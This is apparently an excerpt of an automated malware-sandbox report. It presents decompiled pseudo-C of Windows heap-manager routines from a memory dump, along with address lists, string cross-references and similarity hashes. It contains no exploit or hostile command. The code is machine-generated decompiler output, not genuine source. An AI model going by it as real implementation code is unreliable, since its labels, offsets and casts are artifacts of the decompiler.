						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E00FAFA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E00FBA80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E00F4D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E00EFB150();
										} else {
											E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E00EFB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0xfe6378 = 1;
											asm("int3");
											 *0xfe6378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E00F1A229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E00F1A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E00F1BC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E00FBA80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E00F1A229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E00F1A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E00F4D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E00EFB150();
								} else {
									E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E00EFB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0xfe6378 = 1;
									asm("int3");
									 *0xfe6378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E00FAFA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E00FBA80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E00F4D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E00EFB150();
													} else {
														E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E00EFB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0xfe6378 = 1;
														asm("int3");
														 *0xfe6378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E00F1A229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E00F1A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E00F1BC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E00FBA80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E00F4D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E00EFB150();
													} else {
														E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E00EFB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0xfe6378 = 1;
														asm("int3");
														 *0xfe6378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E00F1A229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E00F1A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E00F1BC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E00F1BC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}

0x00f199ca
0x00f199cc
0x00f199df
0x00f199e3
0x00f199f8
0x00f199fb
0x00f199fb
0x00000000
0x00f19a48
0x00f19a48
0x00f19a4c
0x00f19a51
0x00f19a55
0x00f19a61
0x00f19a66
0x00f19a68
0x00f61457
0x00f6145c
0x00f6145c
0x00f19a68
0x00f19a6e
0x00f19a71
0x00f19a74
0x00f19a76
0x00f61466
0x00f61469
0x00f61469
0x00f6146c
0x00f6146e
0x00f61471
0x00f61474
0x00f61477
0x00f61479
0x00f6159c
0x00f6159c
0x00f6159d
0x00f615a6
0x00f615ab
0x00f615ab
0x00000000
0x00f615ab
0x00f6147f
0x00f61481
0x00000000
0x00000000
0x00f6148a
0x00f6148d
0x00f61493
0x00f61495
0x00f614c0
0x00f614c0
0x00f614c3
0x00f614c6
0x00f614c8
0x00f614cb
0x00f614cf
0x00f614f2
0x00f614f2
0x00f614f5
0x00f614f8
0x00f61501
0x00f61508
0x00f6150b
0x00f6150e
0x00f61510
0x00f61513
0x00f61515
0x00f61515
0x00f61518
0x00f61518
0x00f61513
0x00f61521
0x00f61525
0x00f6152a
0x00f6152d
0x00f61530
0x00f61532
0x00f61539
0x00f6153d
0x00f6155d
0x00f61562
0x00f6153f
0x00f61555
0x00f6155a
0x00f61570
0x00f61577
0x00f6157c
0x00f61582
0x00f61585
0x00f61589
0x00f6158b
0x00f61592
0x00f61593
0x00f61593
0x00f61589
0x00f61530
0x00000000
0x00f614f8
0x00f614d5
0x00f614da
0x00f614dc
0x00000000
0x00f614de
0x00f614e8
0x00000000
0x00f614e8
0x00f61497
0x00f61497
0x00f614a4
0x00f614a4
0x00f614a7
0x00f614a9
0x00f614ab
0x00f614ab
0x00f6149c
0x00f6149e
0x00f614a0
0x00f614b0
0x00f614b0
0x00000000
0x00f614a2
0x00f614a2
0x00000000
0x00f614a2
0x00f614a0
0x00f614b3
0x00f614bb
0x00000000
0x00f614bb
0x00f61495
0x00f19a7c
0x00f19a7c
0x00f19a7f
0x00f19a7f
0x00f19a82
0x00f19a84
0x00f19a87
0x00f19a8a
0x00f19a8d
0x00f19a8f
0x00f6166a
0x00f6166a
0x00f6166b
0x00f61674
0x00000000
0x00f61674
0x00f19a95
0x00f19a97
0x00000000
0x00000000
0x00f19aa0
0x00f19aa3
0x00f19aa9
0x00f19aab
0x00f19ad7
0x00f19ad7
0x00f19ada
0x00f19add
0x00f19adf
0x00f19ae2
0x00f19ae6
0x00f19b22
0x00f19b27
0x00f19b29
0x00000000
0x00f19b2b
0x00f615be
0x00000000
0x00f615be
0x00f19b29
0x00f19ae8
0x00f19ae8
0x00f19aeb
0x00f19aee
0x00f615cb
0x00f615d2
0x00f615d5
0x00f615d7
0x00f615da
0x00f615dc
0x00f615dc
0x00f615dc
0x00f615da
0x00f615e5
0x00f615e9
0x00f615ee
0x00f615f1
0x00f615f3
0x00f615f9
0x00f61600
0x00f61604
0x00f61624
0x00f61629
0x00f61606
0x00f6161c
0x00f61621
0x00f61637
0x00f6163e
0x00f61643
0x00f61649
0x00f6164c
0x00f61650
0x00f61656
0x00f6165d
0x00f6165e
0x00f6165e
0x00f61650
0x00f615f3
0x00f19af4
0x00f19af7
0x00f19afc
0x00f19b00
0x00f19b04
0x00f19b08
0x00f19b14
0x00f199fe
0x00f19a04
0x00f19a07
0x00000000
0x00f19a29
0x00f6169c
0x00f616a0
0x00f616a5
0x00f616a9
0x00f616b5
0x00f616ba
0x00f616bc
0x00f616be
0x00f616c3
0x00f616c3
0x00f616bc
0x00f616c8
0x00f616cc
0x00f6181b
0x00f6181b
0x00f6181e
0x00f6181e
0x00f61821
0x00f61823
0x00f61826
0x00f61829
0x00f6182c
0x00f6182e
0x00f61688
0x00f61688
0x00f61689
0x00f6168b
0x00f6168c
0x00f6168d
0x00f6168f
0x00f61692
0x00000000
0x00f61692
0x00f61834
0x00f61836
0x00000000
0x00000000
0x00f6183f
0x00f61842
0x00f61848
0x00f6184a
0x00f61875
0x00f61875
0x00f61878
0x00f6187b
0x00f6187d
0x00f61880
0x00f61884
0x00f618a7
0x00f618a7
0x00f618aa
0x00f618ad
0x00f618b6
0x00f618bd
0x00f618c0
0x00f618c3
0x00f618c5
0x00f618c8
0x00f618ca
0x00f618ca
0x00f618cd
0x00f618cd
0x00f618c8
0x00f618d5
0x00f618da
0x00f618df
0x00f618e2
0x00f618e5
0x00f618e7
0x00f618ee
0x00f618f2
0x00f61912
0x00f61917
0x00f618f4
0x00f6190a
0x00f6190f
0x00f61925
0x00f6192c
0x00f61931
0x00f6193a
0x00f6193e
0x00f61940
0x00f61947
0x00f61948
0x00f61948
0x00f6193e
0x00f618e5
0x00f6194f
0x00f61952
0x00f61956
0x00f6195d
0x00f61961
0x00f6196d
0x00000000
0x00f6196d
0x00f6188a
0x00f6188f
0x00f61891
0x00000000
0x00000000
0x00f6189d
0x00000000
0x00f6189d
0x00f6184c
0x00f61859
0x00f61859
0x00f6185c
0x00000000
0x00000000
0x00f61851
0x00f61853
0x00f61855
0x00f61865
0x00f61865
0x00f61866
0x00f61868
0x00f61870
0x00000000
0x00f61870
0x00f61857
0x00f61857
0x00f6185e
0x00000000
0x00f616d2
0x00f616d2
0x00f616d5
0x00f616d5
0x00f616d8
0x00f616da
0x00f616dd
0x00f616e0
0x00f616e3
0x00f616e5
0x00f61808
0x00f61808
0x00f61809
0x00f61812
0x00f61817
0x00f61817
0x00000000
0x00f61817
0x00f616eb
0x00f616ed
0x00000000
0x00000000
0x00f616f6
0x00f616f9
0x00f616ff
0x00f61701
0x00f6172c
0x00f6172c
0x00f6172f
0x00f61732
0x00f61734
0x00f61737
0x00f6173b
0x00f6175e
0x00f6175e
0x00f61761
0x00f61764
0x00f6176d
0x00f61774
0x00f61777
0x00f6177a
0x00f6177c
0x00f6177f
0x00f61781
0x00f61781
0x00f61784
0x00f61784
0x00f6177f
0x00f6178c
0x00f61791
0x00f61796
0x00f61799
0x00f6179c
0x00f6179e
0x00f617a5
0x00f617a9
0x00f617c9
0x00f617ce
0x00f617ab
0x00f617c1
0x00f617c6
0x00f617dc
0x00f617e3
0x00f617e8
0x00f617ee
0x00f617f1
0x00f617f5
0x00f617f7
0x00f617fe
0x00f617ff
0x00f617ff
0x00f617f5
0x00f6179c
0x00000000
0x00f61764
0x00f61741
0x00f61746
0x00f61748
0x00000000
0x00000000
0x00f61754
0x00000000
0x00f61754
0x00f61703
0x00f61710
0x00f61710
0x00f61713
0x00000000
0x00000000
0x00f61708
0x00f6170a
0x00f6170c
0x00f6171c
0x00f6171c
0x00f6171d
0x00f6171f
0x00f61727
0x00000000
0x00f61727
0x00f6170e
0x00f6170e
0x00f61715
0x00000000
0x00f61715
0x00f616cc
0x00f19a45
0x00f19a45
0x00f19a0e
0x00f19a1c
0x00f19a23
0x00f6167e
0x00f6167f
0x00f61681
0x00f61683
0x00f61684
0x00000000
0x00f61684
0x00000000
0x00f19aad
0x00f19aad
0x00f19ab0
0x00f19ab3
0x00f19ab3
0x00f19ab6
0x00000000
0x00000000
0x00f19ab8
0x00f19aba
0x00f19abc
0x00f19ac8
0x00f19ac8
0x00000000
0x00f19abe
0x00f19abe
0x00f19ac0
0x00000000
0x00f19ac0
0x00f19abc
0x00f19ad2
0x00000000
0x00f19ad2
0x00f19aab

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 00F61572, 00F61639, 00F617DE, 00F61927
HEAP[%wZ]: , xrefs: 00F61550, 00F61617, 00F617BC, 00F61905
HEAP: , xrefs: 00F6155D, 00F61624, 00F617C9, 00F61912

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 448d30a323e55e1cfd6538ba87c4487f934c9c284d0def5a35d3798458af2d3b
Instruction ID: 2f80e473bf80e55d672e127b6c0d3cf217e155eb0d968dc4683896aa9174999e
Opcode Fuzzy Hash: 448d30a323e55e1cfd6538ba87c4487f934c9c284d0def5a35d3798458af2d3b
Instruction Fuzzy Hash: C6222170A002459FDB24CF28C895BBABBF5FF44714F288569E8468B382D775EC85EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F1B477, Relevance: 4.2, Strings: 3, Instructions: 405
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E00F1B477(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				char _v28;
				signed int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t139;
				void* _t141;
				signed int* _t143;
				signed int* _t144;
				intOrPtr* _t147;
				char _t160;
				signed int* _t163;
				signed char* _t164;
				intOrPtr _t165;
				signed int* _t167;
				signed char* _t168;
				intOrPtr _t193;
				intOrPtr* _t195;
				signed int _t203;
				signed int _t209;
				signed int _t211;
				intOrPtr _t214;
				intOrPtr* _t231;
				intOrPtr* _t236;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t240;
				intOrPtr _t241;
				char _t243;
				signed int _t252;
				signed int _t254;
				signed char _t259;
				signed int _t264;
				signed int _t268;
				intOrPtr _t277;
				unsigned int _t279;
				signed int* _t283;
				intOrPtr* _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t293;

				_v8 =  *0xfed360 ^ _t293;
				_t223 = __edx;
				_v20 = __edx;
				_t291 = __ecx;
				_t276 =  *__edx;
				_t231 = E00F1B8E4( *__edx);
				_t292 = __ecx + 0x8c;
				_v16 = _t231;
				if(_t231 == __ecx + 0x8c) {
					L38:
					_t131 = 0;
					L34:
					return E00F3B640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
				}
				if( *0xfe8748 >= 1) {
					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
					if(__eflags < 0) {
						_t214 =  *[fs:0x30];
						__eflags =  *(_t214 + 0xc);
						if( *(_t214 + 0xc) == 0) {
							_push("HEAP: ");
							E00EFB150();
						} else {
							E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E00EFB150();
						__eflags =  *0xfe7bc8;
						if(__eflags == 0) {
							__eflags = 1;
							E00FB2073(_t223, 1, _t291, 1);
						}
						_t231 = _v16;
					}
				}
				_t5 = _t231 - 8; // -8
				_t292 = _t5;
				_t134 =  *((intOrPtr*)(_t292 + 6));
				if(_t134 != 0) {
					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_t223 = _t291;
				}
				_t276 = _v20;
				_v28 =  *((intOrPtr*)(_t231 + 0x10));
				_t139 =  *(_t291 + 0xcc) ^  *0xfe8a68;
				_v12 = _t139;
				if(_t139 != 0) {
					 *0xfeb1e0(_t291,  &_v28, _t276);
					_t141 = _v12();
					goto L8;
				} else {
					_t203 =  *((intOrPtr*)(_t231 + 0x14));
					_v12 = _t203;
					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
						_t264 = _v12;
						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t276 = _t264;
						}
					}
					_t209 =  *(_t291 + 0x40) & 0x00040000;
					asm("sbb ecx, ecx");
					_t268 = ( ~_t209 & 0x0000003c) + 4;
					_v12 = _t268;
					if(_t209 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v48);
						_push(3);
						_push(_t291);
						_push(0xffffffff);
						_t211 = E00F39730();
						__eflags = _t211;
						if(_t211 < 0) {
							L56:
							_push(_t268);
							_t276 = _t291;
							E00FBA80D(_t291, 1, _v44, 0);
							_t268 = 4;
							goto L7;
						}
						__eflags = _v44 & 0x00000060;
						if((_v44 & 0x00000060) == 0) {
							goto L56;
						}
						__eflags = _v48 - _t291;
						if(__eflags != 0) {
							goto L56;
						}
						_t268 = _v12;
					}
					L7:
					_push(_t268);
					_push(0x1000);
					_push(_v20);
					_push(0);
					_push( &_v28);
					_push(0xffffffff);
					_t141 = E00F39660();
					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
					L8:
					if(_t141 < 0) {
						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
						goto L38;
					}
					_t143 =  *( *[fs:0x30] + 0x50);
					if(_t143 != 0) {
						__eflags =  *_t143;
						if(__eflags == 0) {
							goto L10;
						}
						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
						L11:
						if( *_t144 != 0) {
							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
							if(__eflags != 0) {
								E00FB138A(_t223, _t291, _v28,  *_v20, 2);
							}
						}
						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
							_t287 =  *(_t291 + 0x50) ^  *_t292;
							 *_t292 = _t287;
							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
							if(_t287 >> 0x18 != _t259) {
								_push(_t259);
								E00FAFA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
							}
						}
						_t147 = _v16 + 8;
						 *((char*)(_t292 + 2)) = 0;
						 *((char*)(_t292 + 7)) = 0;
						_t236 =  *((intOrPtr*)(_t147 + 4));
						_t277 =  *_t147;
						_v24 = _t236;
						_t237 =  *_t236;
						_v12 = _t237;
						_t238 = _v16;
						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
							_push(_t238);
							_push(_v12);
							E00FBA80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
							_t238 = _v16;
						} else {
							_t195 = _v24;
							 *_t195 = _t277;
							 *((intOrPtr*)(_t277 + 4)) = _t195;
						}
						if( *(_t238 + 0x14) == 0) {
							L22:
							_t223[0x30] = _t223[0x30] - 1;
							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
							_t279 =  *(_t238 + 0x14);
							if(_t279 >= 0x7f000) {
								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
								_t279 =  *(_t238 + 0x14);
							}
							_t152 = _v20;
							_t240 =  *_v20;
							_v12 = _t240;
							_t241 = _v16;
							if(_t279 <= _t240) {
								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
									L26:
									_t243 = 0;
									 *((char*)(_t292 + 3)) = 0;
									_t276 = _t223[0x18];
									if(_t223[0x18] != _t223) {
										_t160 = (_t292 - _t223 >> 0x10) + 1;
										_v24 = _t160;
										__eflags = _t160 - 0xfe;
										if(_t160 >= 0xfe) {
											_push(0);
											_push(0);
											E00FBA80D(_t276, 3, _t292, _t223);
											_t160 = _v24;
										}
										_t243 = _t160;
									}
									 *((char*)(_t292 + 6)) = _t243;
									_t163 =  *( *[fs:0x30] + 0x50);
									if(_t163 != 0) {
										__eflags =  *_t163;
										if( *_t163 == 0) {
											goto L28;
										}
